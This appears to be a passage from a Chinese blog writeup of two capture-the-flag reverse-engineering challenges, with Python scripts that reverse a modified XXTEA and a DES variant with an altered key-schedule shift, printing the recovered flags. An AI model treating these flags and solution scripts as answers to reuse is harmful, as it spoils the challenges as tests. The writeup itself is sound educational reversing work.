这就明显是xxtea了。然后找到加密串解密即可。

# https://blog.csdn.net/A951860555/article/details/120120400
from ctypes import *


def MX(z, y, total, key, p, e):
    temp1 = (z.value >> 5 ^ y.value << 2) + (y.value >> 3 ^ z.value << 4)
    temp2 = (total.value ^ y.value) + (key[(p & 3) ^ e.value] ^ z.value)

    return c_uint32(temp1 ^ temp2)

def decrypt(n, v, key):
    rounds = 6 + 52 // n

    total = c_uint32(rounds * delta)
    y = c_uint32(v[0])
    e = c_uint32(0)

    while rounds > 0:
        e.value = (total.value >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = c_uint32(v[p - 1])
            v[p] = c_uint32((v[p] - MX(z, y, total, key, p, e).value)).value
            y.value = v[p]
        z = c_uint32(v[n - 1])
        v[0] = c_uint32(v[0] - MX(z, y, total, key, 0, e).value).value
        y.value = v[0]
        total.value -= delta
        rounds -= 1

    return v


#  test
if __name__ == "__main__":
    # 该算法中每次可加密不只64bit的数据,并且加密的轮数由加密数据长度决定
    # 注意大小端, 方向错了没有
    delta = 0x33445566
    k = [3,2,1,4]
    res = [3665721207, 434595956, 2475253452, 3100922088, 329328895, 2689706231, 43194432, 3498298030]
    n = len(res)
    res = decrypt(n, res, k)
    print("Decrypted data is : ",)

    import struct
    for i in res:
        print(struct.pack("<I", i).decode(), end='')
    # 6fbf6171986aa1c63d19301070ef1a65

WuHen

分析,程序主动去触发divzero异常,说明有东西隐藏在异常。通过seh去找
start() -> scrt_common_main_seh() -> initterm((_PVFV *)&First, (_PVFV *)&Last); -> 进到First -> sub_7FF781AC1000 -> 7FF781AC2390

发现这里是一个DES算法。rand()是固定

  else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
  {
    v8 = 0;
    *(_QWORD *)(a1[1] + 72) = 0i64;
    qmemcpy(S1, "鏷-%嫋", 8);
    *(_DWORD *)&S1[12] = 0xD8A5EDAC;
    *(_DWORD *)&S1[16] = 0x23E71CCB;
    *(_DWORD *)&S1[20] = 0x169DDCDA;
    *(_DWORD *)&S1[24] = 0x2DFE7A0;
    *(_DWORD *)&S1[28] = 0x40CA83C;             // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
    KEY[0] = rand();
    KEY[1] = rand();
    KEY[2] = rand();
    KEY[3] = rand();
    KEY[4] = rand();
    KEY[5] = rand();
    KEY[6] = rand();
    KEY[7] = rand();
    ka = *(_QWORD *)KEY;                        // 2923BE84E16CD6AE
    for ( i = 0i64; i != 32; i += 8i64 )
      *(_QWORD *)&In1[i] = Des(*(_QWORD *)&In1[i], ka);
    for ( j = 0i64; j != 32; ++j )
    {
      if ( In1[j] != S1[j] )
        break;
      ++v8;
    }
    if ( v8 == 32 )
      *(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
    return 0xFFFFFFFFi64;
  }

经过超级长的时间调试找到魔改点在循环左移处,改成了左移2,而且这个是小端的传值,都是反向处理一下。

        for j in range(step):
            t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
            t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1

==> main.py <==
from des import Decryption

key = bytes.fromhex('2923BE84E16CD6AE')[::-1]

enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
    enc = bytes.fromhex(enclist[i:i + 16])[::-1]
    res = Decryption(enc, key)
    print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==> CreateSubkey.py <==
MaxTime = 16
# 生成子密钥的置换表1,将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
              1, 58, 50, 42, 34, 26, 18,
              10, 2, 59, 51, 43, 35, 27,
              19, 11, 3, 60, 52, 44, 36,
              63, 55, 47, 39, 31, 23, 15,
              7, 62, 54, 46, 38, 30, 22,
              14, 6, 61, 53, 45, 37, 29,
              21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2,将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
              3, 28, 15, 6, 21, 10,
              23, 19, 12, 4, 26, 8,
              16, 7, 27, 20, 13, 2,
              41, 52, 31, 37, 47, 55,
              30, 40, 51, 45, 33, 48,
              44, 49, 39, 56, 34, 53,
              46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)


def Listmove(l, step):  # 将列表中的元素循环左移
    return l[step:] + l[:step]


def Subkey(key):  # 生成子密钥
    keyresult = []
    key0 = [0 for i in range(56)]

    for i in range(len(key_table1)):
        key0[i] = key[key_table1[i] - 1]

    # 生成16个密钥
    for i in range(MaxTime):
        key1 = [0 for i in range(48)]
        # 确定每次左移的步数
        step = STEP_TABLE[i]
        # if (i == 0 or i == 1 or i == 8 or i == 15):
        #     step = 1
        # else:
        #     step = 2
        # 分成两组
        tmp1 = key0[0:28]
        tmp2 = key0[28:56]
        # print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
        # 循环左移
        # tmp1 = Listmove(tmp1, step)
        # tmp2 = Listmove(tmp2, step)
        for j in range(step):
            t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
            t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
            tmp1 = list(f'{t1:028b}')
            tmp2 = list(f'{t2:028b}')

        # tmp1 = Listmove(tmp1, step*2)
        # tmp2 = Listmove(tmp2, step*2)
        # 左右连接
        key0 = tmp1 + tmp2
        # 置换选择
        for j in range(len(key_table2)):
            key1[j] = key0[key_table2[j] - 1]
        # 生成密钥
        # log(i, key1, tmp1, tmp2)
        keyresult.append(key1)
    # 返回的是一个集合包含了每次的密钥
    return keyresult


def log(i, key1, tmp1, tmp2):
    s = int(''.join(tmp1), 2)
    hex1 =int(''.join(tmp2), 2)
    hex2 = int(''.join(key1), 2)
    print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')

==> des.py <==
import CreateSubkey as cs
import F_function as f

# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f"{x:08b}"]

# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])


# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
    text = Hex2bin(plaintext)
    keybit = Hex2bin(key)

    keylist = cs.Subkey(keybit)
    text1 = f.IP(text, 0)  # IP置换
    L = text1[:32]
    R = text1[32:64]
    for i in range(16):
        tmp = R
        tmp = f.Extend(tmp)
        tmp = f.Xor(tmp, keylist[i])
        # print('xor:', hex(int(''.join(tmp), 2)))
        tmp = f.S_replace(tmp)
        # print('S:', hex(int(''.join(tmp), 2)))
        tmp = f.P_replace(tmp)
        # print('P:', hex(int(''.join(tmp), 2)))
        tmp = f.Xor(tmp, L)
        # print('pres ^ L:', hex(int(''.join(tmp), 2)))
        L = R
        R = tmp
    L, R = R, L
    ctext = L
    ctext.extend(R)
    ctext = f.IP(ctext, 1)
    return bin2Hex(ctext)


def Decryption(ptext, key):
    text = Hex2bin(ptext)
    keybit = Hex2bin(key)

    keylist = cs.Subkey(keybit)
    text1 = f.IP(text, 0)  # IP置换
    L = [text1[i] for i in range(32)]
    R = [text1[i] for i in range(32, 64)]
    for i in range(16):
        tmp = R
        tmp = f.Extend(tmp)
        tmp = f.Xor(tmp, keylist[15 - i])
        tmp = f.S_replace(tmp)
        tmp = f.P_replace(tmp)
        tmp = f.Xor(tmp, L)
        L = R
        R = tmp
    L, R = R, L
    ctext = L
    ctext.extend(R)
    ctext = f.IP(ctext, 1)
    return bin2Hex(ctext)

==> F_function.py <==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
            60, 52, 44, 36, 28, 20, 12, 4,
            62, 54, 46, 38, 30, 22, 14, 6,
            64, 56, 48, 40, 32, 24, 16, 8,
            57, 49, 41, 33, 25, 17, 9, 1,
            59, 51, 43, 35, 27, 19, 11, 3,
            61, 53, 45, 37, 29, 21, 13, 5,
            63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
                39, 7, 47, 15, 55, 23, 63, 31,
                38, 6, 46, 14, 54, 22, 62, 30,
                37, 5, 45, 13, 53, 21, 61, 29,
                36, 4, 44, 12, 52, 20, 60, 28,
                35, 3, 43, 11, 51, 19, 59, 27,
                34, 2, 42, 10, 50, 18, 58, 26,
                33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
      0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
      4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
      15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
      3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
      0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
      13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
      13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
      13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
      1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
      13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
      10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
      3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
      14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
      4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
      11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
      10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
      9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
      4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
      13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
      1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
      6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
      1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
      7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
      2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换,将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
                4, 5, 6, 7, 8, 9,
                8, 9, 10, 11, 12, 13,
                12, 13, 14, 15, 16, 17,
                16, 17, 18, 19, 20, 21,
                20, 21, 22, 23, 24, 25,
                24, 25, 26, 27, 28, 29,
                28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
           1, 15, 23, 26, 5, 18, 31, 10,
           2, 8, 24, 14, 32, 27, 3, 9,
           19, 13, 30, 6, 22, 11, 4, 25]


def int2bit(n):  # 0~15整数转比特
    a = []
    for i in range(0, 4):
        a.insert(0, str(n % 2))
        n = int(n / 2)
    return a


# IP置换部分,op为0表示正置换,op为1表示逆置换
def IP(text, op):
    tmp = [0 for i in range(64)]
    if op == 0:
        for i in range(64):
            tmp[i] = text[IP_table[i] - 1]
        return tmp
    if op == 1:
        for i in range(64):
            tmp[i] = text[Inv_IP_table[i] - 1]
        return tmp


# 进行扩展,将32位扩展为48位
def Extend(text):
    extend = [0 for i in range(48)]
    for i in range(48):
        extend[i] = text[extend_table[i] - 1]
    return extend


# S盒变换部分
def S_replace(text):
    Sresult = [0 for k in range(32)]
    for k in range(8):
        row = 2 * int(text[k * 6]) + int(text[k * 6 + 5])
        column = 8 * int(text[k * 6 + 1]) + 4 * int(text[k * 6 + 2]) + 2 * int(text[k * 6 + 3]) + int(text[k * 6 + 4])
        tmp = S[k][row * 16 + column]

        for i in range(4):
            Sresult[4 * k + i] = int2bit(tmp)[i]
    return Sresult


# P置换部分
def P_replace(text):
    Presult = [0 for i in range(32)]
    for i in range(32):
        Presult[i] = text[P_table[i] - 1]
    return Presult


# 异或运算
def Xor(bit1, bit2):
    Xorresult = [0 for i in range(len(bit1))]
    for i in range(len(bit1)):
        Xorresult[i] = str(int(bit1[i]) ^ int(bit2[i]))
    return Xorresult
wgf42421
关注
  • 17
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第四届红帽杯网络安全大赛-线上Writeup1
08-03
第四届红帽杯络安全-线上Writeup 第四届红帽杯络安全 - 线上 Writeup 第四届红帽杯络安全-线上Writeup 第四届红帽杯络安全-
2021一带一路暨金砖大赛之企业信息系统安全项AWD-writeup(解析)
12-18
通过项检验参选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 引领专业教学...
智能网联汽车 天融信杯 信息安全攻防 2023 CTF真题
07-14
智能网联汽车 天融信杯 信息安全攻防 2023 CTF真题
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
本文档总结了山东省大学生网络安全技能大赛决赛Writeup,涵盖了Crypto0x00 RSA1、RSA2和仿射加密三个部分的知识点。 Crypto0x00 RSA1 在Crypto0x00 RSA1部分中,我们需要使用Python脚本或者OpenSSL来解出RSA加密...
2018第二届强网杯线上ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
在2018年的第二届强网杯线上中,存在一系列难度较大的Web题目,这些题目主要测试参者的Web安全技能,包括但不限于密码学、SQL注入、XSS攻击、CSRF漏洞等。 首先,第一层绕过机制涉及到字符串比较和MD5哈希。...
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 661
详细解说数据分析pandas库中的常用方法
随机数种子的作用
帆的博客
07-23 1306
设置随机数种子(random seed)的目的是为了确保随机数生成器在每次运行时产生相同的随机数序列,从而保证实验结果的一致性。随机数种子通过初始化随机数生成器的内部状态,使得在相同的种子值下,随机数生成器每次调用时生成的序列是相同的。
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 772
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 480
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
安卓手机部署大模型实战
奇舞周刊
07-25 628
本文作者系360奇舞团前端开发工程师前言自ChatGPT发布以来,大语言模型(Large language model, LLM)就成了AI乃至整个计算机科学的话题中心。学术界,工业界围绕大语言模型本身及其应用展开了广泛的讨论,大量的新的实践层出不穷。由于LLM对计算资源的需求极大,有能力部署大语言模型的公司和实验室一般通过搭建集群,然后开放API或者网页demo的方式让用户可以使用模型。在人们纷...
Python数据增强】图像数据集扩充
阿齐Archie
07-25 1618
该脚本用于图像数据增强,特别是目标检测任务中的图像和标签数据增强。通过应用一系列数据增强技术(如旋转、平移、裁剪、加噪声、改变亮度、cutout、翻转等),生成多样化的图像数据集,以提高目标检测模型的鲁棒性和准确性。
python语言利用Tkinter实现GUI计算器|(二)优化计算器:过滤用户不合理的输入
最新发布
人工智能视觉分析算法学习实践和经验分享。
07-27 552
python语言利用Tkinter实现GUI计算器|(二)优化计算器python语言利用Tkinter实现GUI计算器|(二)计算器打包。
Python】 基于Q-learning 强化学习的贪吃蛇游戏(源码+论文)【独一无二】
测试开发自动化
07-26 1424
贪吃蛇环境模块:定义了游戏规则、状态空间、动作空间,并实现了环境的重置和步进逻辑。Q-learning 算法代理模块:实现了 Q-learning 算法,用于学习和决策游戏中的动作选择。游戏窗口模块:使用 Tkinter 创建图形界面展示游戏过程,并与环境和 Q-learning 代理进行交互。该设计使得贪吃蛇游戏能够通过强化学习算法进行自动训练,并通过图形界面展示训练过程。👉👉👉 源码获取 关注【测试开发自动化】公众号,回复 “ 强化贪吃蛇 ” 获取,拿来即用。👈👈👈。
第G2周:人脸图像生成(DCGAN)
lihuhelihu的博客
07-23 985
除了生成器模型的输出层和判别器模型的输入层,在整个对抗网络的其它层上都使用了Batch Normalization,原因是Batch Normalization可以稳定学习,有助于优化初始化参数值不良而导致的训练问题。通过这些层的组合,输入的图像逐渐被降维并提取特征,最终输出一个标量值,表示输入图像被判别为真实图像的概率。总体来说,这段代码实现了GAN的训练过程,通过交替更新判别器和生成器的参数,目标是使生成器生成逼真的图像样本,同时判别器能够准确区分真实图像样本和生成图像样本。
sklearn基础学习
招风的黑耳CSDN
07-23 791
sklearn,或者更正式地称为scikit-learn,是一个基于Python的开源机器学习库。它建立在NumPy、SciPy和matplotlib之上,提供了简单而有效的工具用于数据挖掘和数据分析。sklearn支持监督学习和无监督学习算法,包括分类、回归、聚类和降维等。
Python】如何修改元组的值?
u010528690的博客
07-24 824
元组(tuple)在Python中是不可变数据类型,这意味着一旦创建,就不能更改其内容,包括不能添加、删除或修改元组中的元素。
NumPy冷知识 56个
刘念卿的博客
07-25 928
Numpy冷知识
【CodinGame】趣味算法(教学用) CLASH OF CODE -20240725
weixin_73002968的博客
07-25 316
趣味算法
使用协程实现调用接口 验证抽奖概率
May_JL的博客
07-24 483
使用协程验证抽奖概率
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值